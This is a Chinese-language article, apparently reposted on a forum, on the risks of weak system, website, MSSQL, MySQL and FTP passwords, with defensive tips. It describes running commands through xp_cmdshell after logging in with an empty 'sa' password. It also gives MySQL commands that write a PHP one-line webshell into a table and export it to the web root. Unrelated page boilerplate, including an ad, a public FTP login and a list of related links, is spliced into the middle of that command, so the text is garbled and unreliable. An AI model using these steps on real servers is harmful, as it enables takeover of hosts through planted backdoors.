| 在网络中,密码是用户身分验证的一种方式,各种弱口令都会带来许多重大的安全隐患,比如系统弱口令、网站弱口令、mssql弱口令、mysql弱口令、ftp弱口令等。密码破解是黑客攻击的一种方式,往往黑客采用自己生成的字典对各种密码进行暴力破解,破解软件有x-scan、流光、hscan等。当黑客取得我们的弱口令后会对我们造成什么安全问题,我们看下黑客对各种弱口令的利用就知道了。对于系统弱口令,往往是通过ipc管道破解得到,远程直接登录系统有常见的四种方式,一是3389远程桌面、二是telnet登录、三是ipc通道、四是安装第三方软件进行管理。所以黑客在取得系统弱口令时还得有一个通道进行登录才行。我们一般不开telnet服务和关闭ipc通道能减少很大一部分威胁。系统弱口令分为管理员权限和普通权限,当黑客取得管理员权限的密码直接对我们的机器构成威胁,如果扫描得到普通帐号密码如guest 权限的,还需要进一步提权,一般都通过本地溢出获取系统权限。我们管理远程服务器一般通过3389管理比较好,因为3389是采取加密传输的方式,针对3389的暴力破解是非常困难的,我们再对3389进行更改端口,在服务器采取密码安全策略,关闭139、445端口,以前telnet 等不必要的服务。 对于网站弱口令,特别是管理员的弱口令危害可以直接涉及到网站安全或主机安全,黑客可利用弱口令直接登录后台,并在后台上传恶意脚本(注入栏目已介绍)。我们通常要对网站的密码进行md5加密,管理员密码尽量设置得复杂,才能不给黑客以可乘之机。Mssql弱口令的危害比较大,直接危害到系统安全,现在网上也流行一种扫mssql的弱口令的攻击方式,很多服务器的mssql密码都是sa空口令或是弱口令,当黑客直接取得这些口令后就远程连接并利用xp_cmdshell扩展执行系统命令。如下图:  上图是对我本机的mssql的sa空口令进行连接,连接成功后可以执行dos命令添加用户,如下图:  对于这种mssql弱口令的防范,我们主要是提高安全意识,增加密码的复杂度,并且删除mssql的xp_cmdshell扩展比较好,同时还要注意mssql用户的权限设置,不要给一般的用户设置为mssql服务管理权限。Mysql弱口令跟mssql弱口令一样,会给主机带来很大的危害,拿到数据库root权限后,可以注册mysql函数,同样像windows一样执行系统命令,也可以导出一个webshell,当然得先知道网站路径,如下: mysql -h ip -uroot –p 连接远程mysql show databases; 显示数据库 use test; 打开test数据库 create table test(cmd text); 创建一个test表,文本型,字段为cmd insert into test values("  安全中国首页 > 文章中心 > 破解技术加入安全中国终身VIP会员待遇: 永久学习已开设的所有培训班课程和以后新开培训班课程 赠送无密码保护非会员免费7位QQ 赠送终身VIP会员独享光盘工具包第一版和第二版 为终身VIP会员推荐安排工作就业 安全中国网友投稿专用上传FTP空间: Ftp服务器:download.anqn.com Ftp端口:21 用户名:anqn 密 码:anqn.com 弱口令是用户身分验证的一种危险方式(图) 安全中国 www.anqn.com更新时间:2008-10-13 0:13:21责任编辑:阿loosen 热 点: $Content$ ·上一篇: 对使用星空极速和DHCP+上网方式的共享解决方案 ·下一篇: 暂时空缺 相关文章 ·一起反击黑客!密码与键盘间的对抗(图) ·RAR文件密码破解器:Advanced Archive Password Recovery 4.11 汉化版(图) ·MSN密码恢复工具:MessenPass 1.24中文版(图) ·如何SQL注入猜解管理员用户名和密码(语音) ·中国知音3389密码爆破教程 ·QQ密码防盗技巧(语音) ·内网上灰鸽子不需要路由密码 ·密码生成器 GetPassword 1.0.0(图) ·伪黑客破解QQ密码全过程(图) ·破别人ASP木马密码的方法 一日一文章 一日一软件 一日一动画 POST[cmd]);?> ") 写入一句话马 select * from test into outfile "C:\\Inetpub\\wwwroot\\shell.php"; 导出一个php木马,这里假如网站路径为C:\Inetpub\wwwroot 对于这种方式的防范前面已讲过,主要是加强密码强度和限制mysql只在本机连接和设置好权限。ftp弱口令大家都知道,一个ftp就对应一个网站的空间,拿到ftp就相当于拿到这个网站的权限,黑客通常破解得到ftp密码,然后通过ftp里面网站程序的内容得到网址,再上传一个脚本木马,进一步拿下主机权限,最主要的防范是主机权限的设置和密码的设置,前面已讲。 |
|小黑屋|最新主题|手机版|微赢网络技术论坛
( 苏ICP备08020429号 )
GMT+8, 2024-9-29 11:22 , Processed in 0.181999 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.
